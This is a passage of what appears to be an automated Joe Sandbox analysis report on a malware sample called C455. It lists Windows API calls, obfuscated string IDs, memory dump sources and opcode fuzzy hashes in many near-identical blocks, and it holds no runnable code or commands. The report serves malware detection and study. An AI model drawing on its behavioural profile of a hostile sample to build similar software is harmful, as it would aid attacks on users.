                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(w!s#), ref: 004364FB
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(A3q5), ref: 004365A1
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00436613
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00436775
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004367A0
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004367A6
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                                • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                                • API String ID: 2485776651-4124187736
                                                                                                                                                                                                                                                                • Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                • Instruction ID: 4ba28edbe2fe4a4c66b256c7c3ed3e2468de262ba10ad17656ec8c923f8f3098
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC3242B0601B469FDB48CF2AD580389BBB1FF45300F548698C9695FB5ADB35A892CFC0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                                                • API String ID: 0-119712241
                                                                                                                                                                                                                                                                • Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                                • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                                                                                                                                                                • API String ID: 0-2430453506
                                                                                                                                                                                                                                                                • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                • Instruction ID: c35d7f42c20f0be16d434dd053aaad9d877c9939d0b6e145a9b52dd94e4f39ef
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9B1F77014C3818FE328CF2984917BBBBE2AFD2314F288A6DD4D98B291DB748549C757
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 009F8A1B
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 009F8A25
                                                                                                                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 009F8AC2
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 009F8AD7
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 009F8BD9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4063528623-0
                                                                                                                                                                                                                                                                • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                • Instruction ID: 1e0f4314e4f00e548d5e3687078b7166540abdd3a3c4ce89b86555285e9ce1f8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5417E77F4431807D71CAE78DC5A37BB69A9BC4314F09803E6A85AB390DD795C0593C1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: )*$X9{;$r1B
                                                                                                                                                                                                                                                                • API String ID: 0-1001561910
                                                                                                                                                                                                                                                                • Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                                • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: -$C\$Iz$[^$de
                                                                                                                                                                                                                                                                • API String ID: 0-3020956940
                                                                                                                                                                                                                                                                • Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                                • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                                                • API String ID: 0-3335612808
                                                                                                                                                                                                                                                                • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                • Instruction ID: 0530d664f5bcbeff17e9de3a6b5eeb66c6bc05ecc9b022d81782bca7362410cc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BD1F8B5608301CBD724DF25C851BAB77F2FF92354F18996CD4828B394E7B99881CB52
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                • API String ID: 0-923305466
                                                                                                                                                                                                                                                                • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                • Instruction ID: ce8dab1052aecd3d2a141027c586946534dc5c70b9ce804d773749f0a6577221
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7EA1077014C3818FE368CF2984917EBBBD2AFD2314F288A6DD4DA8B291DB748449C757
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                • API String ID: 0-923305466
                                                                                                                                                                                                                                                                • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                • API String ID: 0-923305466
                                                                                                                                                                                                                                                                • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                • Instruction ID: 9a383505960dce75437d116ddc31f6ca5044d3363f536c2160bc0fe15946e31c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FA1F87014C3818FE368CF2984917EBBBD2AFD2314F288A6DD4DA8B291DB748549C757
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                • API String ID: 0-923305466
                                                                                                                                                                                                                                                                • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                • API String ID: 0-923305466
                                                                                                                                                                                                                                                                • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                • Instruction ID: 27b749f67e86d136361f7d3b034ab58fefd76eb203c4ef5dc1c9af48285fc891
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6A1F57014C3818EE324CF2994917EBBBD2AFE2314F288A6DD4D98B291DB748449C757
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                • API String ID: 0-923305466
                                                                                                                                                                                                                                                                • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: in~x$kmbj$ydij$Z\
                                                                                                                                                                                                                                                                • API String ID: 0-979945983
                                                                                                                                                                                                                                                                • Opcode ID: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                                • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                                • API String ID: 0-3432275560
                                                                                                                                                                                                                                                                • Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                • Instruction ID: a18a88660c7a77480f7c4acf0bbbc6e3d35eb30826fdb67aa3159cf5a24d28af
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC42487050C3948FC725DF28D85076EBBE1AF96314F088A6DE8E54B3D2D7368909E752
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                                • API String ID: 0-3432275560
                                                                                                                                                                                                                                                                • Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                                • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                • API String ID: 0-261129489
                                                                                                                                                                                                                                                                • Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                                • Instruction ID: 46dcabdacc1a7138d3a8bc08d20757b81bccd1ce5d9350535ceff7f5d53c6d7e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1E1067112D3C18BE725CF29C4517FABBD6EF92304F18896DD0D987292DB38844AC766
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                • API String ID: 0-261129489
